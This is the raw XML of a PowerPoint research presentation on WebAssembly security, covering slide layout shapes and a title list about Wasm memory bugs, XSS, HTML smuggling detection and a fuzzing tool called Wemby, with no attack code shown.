        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4861536" y="5266846"/>
            <a:ext cx="381901" cy="294394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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="103" name="Gerade Verbindung 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E358A310-B6C8-9528-1B48-150CE3A9E57B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="32" idx="5"/>
            <a:endCxn id="35" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5566727" y="5266846"/>
            <a:ext cx="599613" cy="267035"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="7C60C6"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle" w="med" len="lg"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr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D031DC02-A308-E68C-2248-6B0FD4FC8864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8670257" y="1516057"/>
            <a:ext cx="3383656" cy="2589437"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="50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4" name="Grafik 1032" descr="Ein Bild, das Electric Blue (Farbe), Grafiken, Mond, Kreis enthält.&#10;&#10;Automatisch generierte Beschreibung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A4D80E-E5B6-C803-DAD0-32BBB2DAB8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03020" y="1795961"/>
            <a:ext cx="755068" cy="7531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5" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B72E617C-5398-59FC-761F-164C55D64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32" y="3167182"/>
            <a:ext cx="1083522" cy="10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C4BD5CA-5EE0-314D-5376-DA601850727A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>
            <a:off x="9380554" y="2549098"/>
            <a:ext cx="16739" cy="61808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5F100C0E-5B09-756D-8EDF-F6D5C1BE248E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10104594" y="2112570"/>
            <a:ext cx="1758549" cy="634945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5086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Binary Address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sanitizer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541EA882-7922-4131-9FB7-EC937CC45955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10102164" y="3147342"/>
            <a:ext cx="1806338" cy="634945"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5086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Generate structured input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Plus Sign 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F7B777-C9A2-655A-8FD0-A76449F0E153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9519385" y="2620959"/>
            <a:ext cx="710893" cy="693543"/>
          </a:xfrm>
          <a:prstGeom prst="mathPlus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Connector: Curved 142">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{271986D5-BD22-B908-7552-1F0BA639C0C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5303963" y="2732802"/>
            <a:ext cx="992365" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="92D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Curved 150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A942F9D6-3369-8CDB-A6C9-9109262760AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="29" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6006218" y="3357596"/>
            <a:ext cx="493416" cy="219460"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst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E2D59B8F-2C1D-3EB9-5E93-2B7B55994F47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8802088" y="2747834"/>
            <a:ext cx="388749" cy="399392"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="5086B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3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35830E8-0235-62E6-6860-32DC2995CF3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2549024" y="2496123"/>
            <a:ext cx="3446094" cy="905037"/>
            <a:chOff x="2259464" y="2496123"/>
            <a:chExt cx="3446094" cy="905037"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="190" name="Connector: Curved 189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07119439-4133-8248-5F38-FFF1AAD9B81F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="121" idx="3"/>
              <a:endCxn id="191" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2259464" y="2701074"/>
              <a:ext cx="3044870" cy="70008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5086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0353CA7-1E75-4041-91A9-EE24C2015AB0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5304334" y="2496123"/>
              <a:ext cx="401224" cy="409901"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="5086B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47811FDC-CF5F-857B-061D-387F501AF2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2910751" y="3314502"/>
            <a:ext cx="3531454" cy="1442611"/>
            <a:chOff x="2910751" y="3314502"/>
            <a:chExt cx="3531454" cy="1442611"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="192" name="Connector: Curved 191">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB9FB902-DD7B-2153-6873-F7C4C45CB01A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="122" idx="3"/>
              <a:endCxn id="193" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2910751" y="3483311"/>
              <a:ext cx="3149519" cy="127380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5086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FF46BEE9-35A5-39A4-D110-6896D829DADD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6060270" y="3314502"/>
              <a:ext cx="381935" cy="337617"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="5086B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ED24FE96-8E83-6945-7E5F-DDBD363D910D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="123" idx="2"/>
            <a:endCxn id="148" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10362085" y="4105494"/>
            <a:ext cx="4870" cy="150956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DE57D6F7-9043-4E6B-998C-4BCDC9D0B0D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="286391" y="2821224"/>
            <a:ext cx="2262633" cy="992075"/>
            <a:chOff x="286391" y="3599438"/>
            <a:chExt cx="2262633" cy="992075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5BBF7098-6817-091C-ED87-46ADBC310861}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="493101" y="3767234"/>
              <a:ext cx="2055923" cy="824279"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5086B5"/>
            </a:solidFill>
            <a:ln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Trace tainted data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CA6455D3-E091-B50D-B2F6-784930AD2BED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="286391" y="3599438"/>
              <a:ext cx="388749" cy="39939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1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D3202A63-3F01-6B14-FE32-E5E20DFE4DCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="229144" y="3942634"/>
            <a:ext cx="2681607" cy="1387604"/>
            <a:chOff x="286391" y="4797112"/>
            <a:chExt cx="2681607" cy="1387604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4C68FC62-1C98-EF0D-C9D0-F2D912755813}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="493101" y="5038466"/>
              <a:ext cx="2474897" cy="1146250"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5086B5"/>
            </a:solidFill>
            <a:ln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Snapshot </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" err="1"/>
                <a:t>Wasm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000"/>
                <a:t> memory at function calls</a:t>
              </a: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655C9774-D7CC-EAE6-1EB9-AF5263B4C193}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="286391" y="4797112"/>
              <a:ext cx="388749" cy="39939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2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4FCC4782-AC5A-EE14-E6A6-A0AE30B624CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="148" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8359316" y="5932531"/>
            <a:ext cx="979677" cy="1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5E99E30-991B-4115-C774-4751C4C6D1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9214852" y="5225408"/>
            <a:ext cx="2751171" cy="1024596"/>
            <a:chOff x="9214852" y="5225408"/>
            <a:chExt cx="2751171" cy="1024596"/>
          </a:xfrm>
        </p:grpSpPr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1008B592-4560-6DC2-F719-CFABDA8ABFA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9338993" y="5615059"/>
              <a:ext cx="2055923" cy="634945"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="5086B5"/>
            </a:solidFill>
            <a:ln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err="1"/>
                <a:t>Fuzzer</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2800"/>
            </a:p>
          </p:txBody>
        </p:sp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D0FFA26F-19DF-D133-A7CD-1C17459BE2E9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56491" y="5225408"/>
              <a:ext cx="909532" cy="910825"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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5094FD06-186F-B908-F96E-B62BE0C29DB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9214852" y="5409939"/>
              <a:ext cx="388749" cy="399392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5086B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4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62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B24CC22E-3FF7-41A1-2926-14FB0DB8DBD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1521064" y="1926356"/>
            <a:ext cx="1604989" cy="1062664"/>
            <a:chOff x="2507954" y="2357768"/>
            <a:chExt cx="1604989" cy="1062664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="22" name="Connector: Curved 189">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB8030D3-6EDC-9321-9B5C-E52E6CA952B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="121" idx="0"/>
              <a:endCxn id="25" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="2680980" y="2389693"/>
              <a:ext cx="857713" cy="1203766"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="5086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190">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF229A56-E955-9780-7224-72C605A43DF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3711719" y="2357768"/>
              <a:ext cx="401224" cy="409901"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="5086B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E2EB98C-9992-6F20-8F40-1B8C5C6197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5" y="2279806"/>
            <a:ext cx="3402092" cy="36527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94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98" grpId="0" animBg="1"/>
      <p:bldP spid="123" grpId="0" animBg="1"/>
      <p:bldP spid="132" grpId="0" animBg="1"/>
      <p:bldP spid="135" grpId="0" animBg="1"/>
      <p:bldP spid="140" grpId="0" animBg="1"/>
      <p:bldP spid="1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AFD1099-19D8-9ACD-158A-AF949BCA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real-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?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751132D-DEEC-587D-1E0A-9F772CF43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4800" b="1" dirty="0" err="1"/>
              <a:t>Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" b="1" dirty="0" err="1"/>
              <a:t>Wemby</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" b="1" dirty="0"/>
              <a:t> on 37,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4800" b="1" dirty="0" err="1"/>
              <a:t>domains</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="4800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1832CA-E3B4-4B58-77DA-EB0AB0E0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24.07.2025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D744AB-ABCE-3655-BC66-FCA3C958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Securing the Next-Generation Web: A Holistic Approach to Wasm Vulnerabilities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6B1597-12D3-D78A-C541-F1762614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18F4C-E8C4-4CE3-AB98-635666EFA01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5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D128D36A15F314DA09620B44CF78996" ma:contentTypeVersion="15" ma:contentTypeDescription="Ein neues Dokument erstellen." ma:contentTypeScope="" ma:versionID="76d39992990ac6cd3169a7dc9dceb991">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="59b9d596-0bdf-4347-940a-83d106dfbed5" xmlns:ns4="7ab71e76-6362-4e6e-bc59-c8ae12ec2174" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="9ad2873c1915951de1eaa78ed0a77232" ns3:_="" ns4:_="">
    <xsd:import namespace="59b9d596-0bdf-4347-940a-83d106dfbed5"/>
    <xsd:import namespace="7ab71e76-6362-4e6e-bc59-c8ae12ec21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d596-0bdf-4347-940a-83d106dfb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71e76-6362-4e6e-bc59-c8ae12ec2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b9d596-0bdf-4347-940a-83d106dfbed5" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{6B85D2E6-B519-4C53-AFF6-346779B97F33}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="59b9d596-0bdf-4347-940a-83d106dfbed5"/>
    <ds:schemaRef ds:uri="7ab71e76-6362-4e6e-bc59-c8ae12ec21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DC57955-E65B-4FA0-937A-C6E0551E67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C5915C-8B9B-4E11-8466-0B4E069200EE}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="7ab71e76-6362-4e6e-bc59-c8ae12ec2174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59b9d596-0bdf-4347-940a-83d106dfbed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3212</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>612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</vt:lpstr>
      <vt:lpstr>Securing the Next-Generation Web</vt:lpstr>
      <vt:lpstr>WebAssembly (Wasm) </vt:lpstr>
      <vt:lpstr>Applications using Wasm</vt:lpstr>
      <vt:lpstr>Security By Design</vt:lpstr>
      <vt:lpstr>From a Memory Error to Cross-site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Related Work</vt:lpstr>
      <vt:lpstr>How to automatically detect bugs at scale?</vt:lpstr>
      <vt:lpstr>Wemby Architecture</vt:lpstr>
      <vt:lpstr>What is the real-world impact of this threat model?</vt:lpstr>
      <vt:lpstr>New Attack Vectors</vt:lpstr>
      <vt:lpstr>Implicit Trust, Explicit Danger</vt:lpstr>
      <vt:lpstr>Prevalance of a new Threat Model</vt:lpstr>
      <vt:lpstr>Memory Corruption in the Wild</vt:lpstr>
      <vt:lpstr>Quantitative Evaluation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OnePlus Example</vt:lpstr>
      <vt:lpstr>How can we detect HTML smuggling? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How to detect exploitation  at runtime?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How do we turn exploitation into a game of chance?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>User Protection Challenges</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Securing the Next-Generation Web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Software Systems</dc:title>
  <dc:creator>Oussama Draissi</dc:creator>
  <cp:lastModifiedBy>Oussama Draissi</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-03-22T14:58:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-09T17:44:03Z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0x010100AD128D36A15F314DA09620B44CF78996</vt:lpwstr>
  </property>
</Properties>
</file>